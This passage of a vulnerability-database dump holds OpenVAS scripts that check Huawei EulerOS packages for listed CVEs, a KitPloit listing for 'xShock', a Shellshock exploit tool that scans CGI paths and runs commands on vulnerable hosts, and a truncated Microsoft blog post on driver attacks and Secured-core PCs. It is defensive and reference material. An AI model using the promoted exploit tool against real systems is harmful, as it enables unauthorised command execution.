re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1222\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1222\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'unzip' package(s) announced via the EulerOS-SA-2020-1222 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Info-ZIP UnZip 6.0 allows remote attackers to cause a denial of service (infinite loop) via empty bzip2 data in a ZIP archive.(CVE-2015-7697)\n\n\nInfo-ZIP UnZip 6.0 allows remote attackers to cause a denial of service (heap-based buffer over-read and application crash) or possibly execute arbitrary code via a crafted password-protected ZIP archive, possibly related to an Extra-Field size value.(CVE-2015-7696)\");\n\n script_tag(name:\"affected\", value:\"'unzip' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"unzip\", rpm:\"unzip~6.0~19.h7\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-14T16:51:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562311220201196", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201196", "title": "Huawei EulerOS: Security Advisory for perl (EulerOS-SA-2020-1196)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1196\");\n script_version(\"2020-03-13T07:12:54+0000\");\n script_cve_id(\"CVE-2013-7422\", \"CVE-2016-1238\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 07:12:54 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-13 07:12:54 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for perl (EulerOS-SA-2020-1196)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1196\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1196\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'perl' package(s) announced via the EulerOS-SA-2020-1196 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Integer underflow in regcomp.c in Perl before 5.20, as used in Apple OS X before 10.10.5 and other products, allows context-dependent attackers to execute arbitrary code or cause a denial of service (application crash) via a long digit string associated with an invalid backreference within a regular expression.(CVE-2013-7422)\n\nIt was found that perl can load modules from the current directory if not found in the module directories, via the @INC path. A local, authenticated attacker could create a specially crafted module in a writable directory and trick a user into running a perl program from that directory, if the module is not found in previous @INC paths, it will load and execute the attacker's module.(CVE-2016-1238)\");\n\n script_tag(name:\"affected\", value:\"'perl' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"perl\", rpm:\"perl~5.16.3~292.h10\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Pod-Escapes\", rpm:\"perl-Pod-Escapes~1.04~292.h10\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-libs\", rpm:\"perl-libs~5.16.3~292.h10\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-macros\", rpm:\"perl-macros~5.16.3~292.h10\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-14T16:49:09", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562311220201256", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201256", "title": "Huawei EulerOS: Security Advisory for libpng (EulerOS-SA-2020-1256)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1256\");\n script_version(\"2020-03-13T07:18:33+0000\");\n script_cve_id(\"CVE-2013-7353\", \"CVE-2013-7354\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 07:18:33 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-13 07:18:33 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for libpng (EulerOS-SA-2020-1256)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1256\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1256\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'libpng' package(s) announced via the EulerOS-SA-2020-1256 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple integer overflows in libpng before 1.5.14rc03 allow remote attackers to cause a denial of service (crash) via a crafted image to the (1) png_set_sPLT or (2) png_set_text_2 function, which triggers a heap-based buffer overflow.(CVE-2013-7354)\n\n\nInteger overflow in the png_set_unknown_chunks function in libpng/pngset.c in libpng before 1.5.14beta08 allows context-dependent attackers to cause a denial of service (segmentation fault and crash) via a crafted image, which triggers a heap-based buffer overflow.(CVE-2013-7353)\");\n\n script_tag(name:\"affected\", value:\"'libpng' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libpng\", rpm:\"libpng~1.5.13~7.1.h5\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-03-14T16:47:48", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562311220201261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201261", "title": "Huawei EulerOS: Security Advisory for icu (EulerOS-SA-2020-1261)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1261\");\n script_version(\"2020-03-13T07:18:41+0000\");\n script_cve_id(\"CVE-2014-7923\", \"CVE-2014-7926\", \"CVE-2014-7940\", \"CVE-2014-9654\", \"CVE-2016-6293\", \"CVE-2016-7415\", \"CVE-2017-7867\", \"CVE-2017-7868\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 07:18:41 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-13 07:18:41 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for icu (EulerOS-SA-2020-1261)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1261\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1261\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'icu' package(s) announced via the EulerOS-SA-2020-1261 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"International Components for Unicode (ICU) for C/C++ before 2017-02-13 has an out-of-bounds write caused by a heap-based buffer overflow related to the utf8TextAccess function in common/utext.cpp and the utext_moveIndex32* function.(CVE-2017-7868)\n\nA vulnerability was found in the International Components for Unicode (ICU). Specially crafted invalid utf-8 text, when parsed or manipulated using particular functions in libicu, could cause out-of-bounds heap reads and writes potentially leading to a crash, memory disclosure, or possibly code execution.(CVE-2017-7867)\n\n\nThe Regular Expressions package in International Components for Unicode (ICU) for C/C++ before 2014-12-03, as used in Google Chrome before 40.0.2214.91, calculates certain values without ensuring that they can be represented in a 24-bit field, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted string, a related issue to CVE-2014-7923.(CVE-2014-9654)\n\nStack-based buffer overflow in the Locale class in common/locid.cpp in International Components for Unicode (ICU) through 57.1 for C/C++ allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a long locale string.(CVE-2016-7415)\n\n\nThe uloc_acceptLanguageFromHTTP function in common/uloc.cpp in International Components for Unicode (ICU) through 57.1 for C/C++ does not ensure that there is a '\\\\0' character at the end of a certain temporary array, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long httpAcceptLanguage argument.(CVE-2016-6293)\n\n\nThe collator implementation in i18n/ucol.cpp in International Components for Unicode (ICU) 52 through SVN revision 293126, as used in Google Chrome before 40.0.2214.91, does not initialize memory for a data structure, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted character sequence.(CVE-2014-7940)\n\n\nThe Regular Expressions package in International Components for Unicode (ICU) 52 before SVN revision 292944, as used in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via vectors related to a zero-length quantifier.(CVE-2014-7926)\n\n\nThe Regular Expressions package in International Components for Unicode (ICU) 52 before SVN revision 292944, as used in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via vectors related to a look-behind expression.(CVE-2014-7923)\");\n\n script_tag(name:\"affected\", value:\"'icu' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"libicu\", rpm:\"libicu~50.1.2~15.h6\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-14T16:48:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-03-13T00:00:00", "published": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562311220201225", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220201225", "title": "Huawei EulerOS: Security Advisory for patch (EulerOS-SA-2020-1225)", "type": "openvas", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2020.1225\");\n script_version(\"2020-03-13T07:15:49+0000\");\n script_cve_id(\"CVE-2014-9637\", \"CVE-2015-1196\", \"CVE-2016-10713\", \"CVE-2018-20969\", \"CVE-2019-13638\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 07:15:49 +0000 (Fri, 13 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-03-13 07:15:49 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for patch (EulerOS-SA-2020-1225)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRTARM64-3\\.0\\.2\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2020-1225\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1225\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'patch' package(s) announced via the EulerOS-SA-2020-1225 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An issue was discovered in GNU patch before 2.7.6. Out-of-bounds access within pch_write_line() in pch.c can possibly lead to DoS via a crafted input file.(CVE-2016-10713)\n\nGNU patch 2.7.2 and earlier allows remote attackers to cause a denial of service (memory consumption and segmentation fault) via a crafted diff file.(CVE-2014-9637)\n\nGNU patch 2.7.1 allows remote attackers to write to arbitrary files via a symlink attack in a patch file.(CVE-2015-1196)\n\nGNU patch through 2.7.6 is vulnerable to OS shell command injection that can be exploited by opening a crafted patch file that contains an ed style diff payload with shell metacharacters. The ed editor does not need to be present on the vulnerable system. This is different from CVE-2018-1000156.(CVE-2019-13638)\n\ndo_ed_script in pch.c in GNU patch through 2.7.6 does not block strings beginning with a ! character. NOTE: this is the same commit as for CVE-2019-13638, but the ! syntax is specific to ed, and is unrelated to a shell metacharacter.(CVE-2018-20969)\");\n\n script_tag(name:\"affected\", value:\"'patch' package(s) on Huawei EulerOS Virtualization for ARM 64 3.0.2.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRTARM64-3.0.2.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"patch\", rpm:\"patch~2.7.1~10.h3\", rls:\"EULEROSVIRTARM64-3.0.2.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2020-03-19T14:47:53", "bulletinFamily": "tools", "description": "[ ![](https://1.bp.blogspot.com/-666WDslQJ1M/XnLvcRpsRpI/AAAAAAAAR84/Rwp3KYi5y3QcDrXBSR3ZO1O-lyym7oAAACNcBGAsYHQ/s1600/XSHOCK_1.png) ](<https://1.bp.blogspot.com/-666WDslQJ1M/XnLvcRpsRpI/AAAAAAAAR84/Rwp3KYi5y3QcDrXBSR3ZO1O-lyym7oAAACNcBGAsYHQ/s1600/XSHOCK_1.png>)\n\n \nxShock ShellShock (CVE-2014-6271) \nThis tool [ exploits ](<https://www.kitploit.com/search/label/Exploits> \"exploits\" ) shellshock. \n \n** Written by Hulya Karabag ** \n** Version 1.0.0 ** \nInstagram: [ Capture the Root ](<https://www.instagram.com/capturetheroot/> \"Capture the Root\" ) \n \n** Screenshots ** \n \n\n\n[ ![](https://1.bp.blogspot.com/-FI5yE4OxGPE/XnLvlRJXohI/AAAAAAAAR9E/hdyFc9T8R-8nFYltfQw6mJQqX6kwsK1YwCNcBGAsYHQ/s640/XSHOCK_2.png) ](<https://1.bp.blogspot.com/-FI5yE4OxGPE/XnLvlRJXohI/AAAAAAAAR9E/hdyFc9T8R-8nFYltfQw6mJQqX6kwsK1YwCNcBGAsYHQ/s1600/XSHOCK_2.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-LgSbK1L8ZHw/XnLvlStDBTI/AAAAAAAAR9A/wR5OvtZ2bXwdnhrXqlZaZWYSvX17EaT7QCNcBGAsYHQ/s640/XSHOCK_3.png) ](<https://1.bp.blogspot.com/-LgSbK1L8ZHw/XnLvlStDBTI/AAAAAAAAR9A/wR5OvtZ2bXwdnhrXqlZaZWYSvX17EaT7QCNcBGAsYHQ/s1600/XSHOCK_3.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-1-5sRSwCKws/XnLvlT-RKzI/AAAAAAAAR88/OQmBay-KuugSL-nCJRjEFAFwRHnHCi-BACNcBGAsYHQ/s640/XSHOCK_4.png) ](<https://1.bp.blogspot.com/-1-5sRSwCKws/XnLvlT-RKzI/AAAAAAAAR88/OQmBay-KuugSL-nCJRjEFAFwRHnHCi-BACNcBGAsYHQ/s1600/XSHOCK_4.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-sH3Y0I1PLJI/XnLvmNb27nI/AAAAAAAAR9I/jAaUqA7qWBk_SwS2UhWdWznHm_FUlEUOQCNcBGAsYHQ/s640/XSHOCK_5.png) ](<https://1.bp.blogspot.com/-sH3Y0I1PLJI/XnLvmNb27nI/AAAAAAAAR9I/jAaUqA7qWBk_SwS2UhWdWznHm_FUlEUOQCNcBGAsYHQ/s1600/XSHOCK_5.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-4hCpuqMuGN0/XnLvmTEv2mI/AAAAAAAAR9M/c3BuyX0WwrswYvjvxzcv-2DP4yghtmKGACNcBGAsYHQ/s640/XSHOCK_6.png) ](<https://1.bp.blogspot.com/-4hCpuqMuGN0/XnLvmTEv2mI/AAAAAAAAR9M/c3BuyX0WwrswYvjvxzcv-2DP4yghtmKGACNcBGAsYHQ/s1600/XSHOCK_6.png>)\n\n \n\n\n[ ![](https://1.bp.blogspot.com/-BEEXi3HN--8/XnLvmi2WauI/AAAAAAAAR9Q/i2VqA5X39Rk057oT33loyJ6O14_bvpLQwCNcBGAsYHQ/s640/XSHOCK_7.png) ](<https://1.bp.blogspot.com/-BEEXi3HN--8/XnLvmi2WauI/AAAAAAAAR9Q/i2VqA5X39Rk057oT33loyJ6O14_bvpLQwCNcBGAsYHQ/s1600/XSHOCK_7.png>)\n\n \n** How to use ** \n \n\n\n \n** Read Me ** \nAll founded directories will be saved in ** vulnurl.txt ** file. The results of the executed commands are saved in response.txt. \n \n** Features ** \nThis tool ** include: ** \n\n\n * CGI VULNERABILITY \n * DIRECTORY SCAN \n * RUN COMMAND WITH FOUNDED CGI \n * SHOW VULNERABLE URLS \n * UPDATE PROXY \n\n \n\n\n** Installation ** \n \n** Installation with requirements.txt ** \n\n \n \n git clone https://github.com/capture0x/xShock/\n cd xShock\n pip3 install -r requirements.txt\n\n \n** Usage ** \n\n \n \n python3 main.py\n\n \n** CGI VULNERABILITY ** \nChecks cgi-bin directory on the target site \ne.g: \n\n \n \n http://targetsite.com\n\n \n** DIRECTORY SCAN ** \nThis works with wordlists. Scans url on the target site. Important notice: Please enter full path of [ wordlist ](<https://www.kitploit.com/search/label/Wordlist> \"wordlist\" ) after the url.(Not file. It should be directory) \ne.g: http:// targetsite.com/cgi-bin/ ** selectedworlist ** \ne.g: \n\n \n \n http://targetsite.com/cgi-bin\n /usr/share/wordlists/dirb --> This is directory of wordlist. Not file!\n\n \n** RUN COMMAND WITH FOUNDED CGI ** \nBy entering the url in the vuln.txt file, you can try running commands in the found urls. \n\n \n \n http://targetsite.com/cgi-bin/status\n\n \n** SHOW VULNERABLE URLS ** \nShows founded urls in vuln.txt file. \n \n** UPDATE PROXY ** \nYou can update proxies from web manually. \n \n** Known Issues ** \n\\-- \n \n** Bugs and enhancements ** \nFor bug reports or enhancements, please open an [ issue ](<https://github.com/capture0x/xShock/issues> \"issue\" ) here. \n \n** Support and Donations ** \nContact us with [ email ](<https://www.kitploit.com/search/label/Email> \"email\" ) [email protected] \n** Copyright 2020 ** \n \n \n\n\n** [ Download XSHOCK ](<https://github.com/capture0x/XSHOCK> \"Download XSHOCK\" ) **\n", "modified": "2020-03-19T11:30:03", "published": "2020-03-19T11:30:03", "id": "KITPLOIT:1907207623071471216", "href": "http://www.kitploit.com/2020/03/xshock-shellshock-exploit.html", "title": "xShock - Shellshock Exploit", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2020-03-17T16:29:23", "bulletinFamily": "blog", "description": "Gaining kernel privileges by taking advantage of legitimate but vulnerable kernel drivers has become an established tool of choice for advanced adversaries. Multiple malware attacks, including RobbinHood, Uroburos, Derusbi, GrayFish, and Sauron, and campaigns by the threat actor STRONTIUM, have leveraged driver vulnerabilities (for example, [CVE-2008-3431](<https://www.cvedetails.com/cve/CVE-2008-3431/>), [CVE-2013-3956](<https://www.cvedetails.com/cve/CVE-2013-3956/>), [CVE-2009-0824](<https://www.cvedetails.com/cve/CVE-2009-0824/>), [CVE-2010-1592](<https://www.cvedetails.com/cve/CVE-2010-1592/>), etc.) to gain kernel privileges and, in some cases, effectively disable security agents on compromised machines.\n\nDefending against these types of threats\u2014whether those that live off the land by using what\u2019s already on the machine or those that bring in vulnerable drivers as part of their attack chain\u2014requires a fresh approach to security, one that combines threat defense on multiple levels: silicon, operating system, and cloud. Microsoft brought this chip-to-cloud approach with [Azure Sphere](<https://azure.microsoft.com/en-us/services/azure-sphere/>), the integrated security solution for IoT devices and equipment. We brought the same approach to securing endpoint devices through [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers?SilentAuth=1>).\n\nSecured-core PCs combine virtualization, operating system, and hardware and firmware protection. Along with [Microsoft Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), Secured-core PCs provide end-to-end protection against advanced threats.\n\n## Hardware profile guaranteed to support the latest hardware-backed security features\n\nMicrosoft worked internally and externally with OEM partners Lenovo, HP, Dell, Panasonic, Dynabook, and Getac to introduce a new a class of devices, Secured-core PCs. Secured-core PCs address the need for customers to perform the complex decision flow of mapping which security feature (e.g., hypervisor-protected code integrity ([HVCI](<https://docs.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity>)), virtualization-based security ([VBS](<https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs>)), [Windows Defender Credential Guard](<https://docs.microsoft.com/en-us/windows/security/identity-protection/credential-guard/credential-guard>)) are supported by which hardware (e.g., TPM 1.0, 2.0, etc.).\n\nWith Secured-core PCs, customers no longer need to make this complex decision; they\u2019re assured that these devices support the latest hardware-backed security features.\n\n## Hardware-backed security features enabled by default\n\nSecured-core PCs have the hardware-backed security featured enabled by default, removing the need for customers to test and enable these features, which require a combination of BIOS and OS settings changes.\n\nBecause both BIOS settings and OS settings are enabled out of the box with these devices, the burden to enable these features onsite is removed for customers. The following hardware-backed security features are **enabled by default** on any Secured-core PC:\n\n \n\n**Security promise** | **Technical features** \n---|--- \nProtect with hardware root of trust | TPM 2.0 or higher \nTPM support enabled by default \nVirtualization-based security (VBS) enabled \nDefend against firmware attack | [Windows Defender System guard 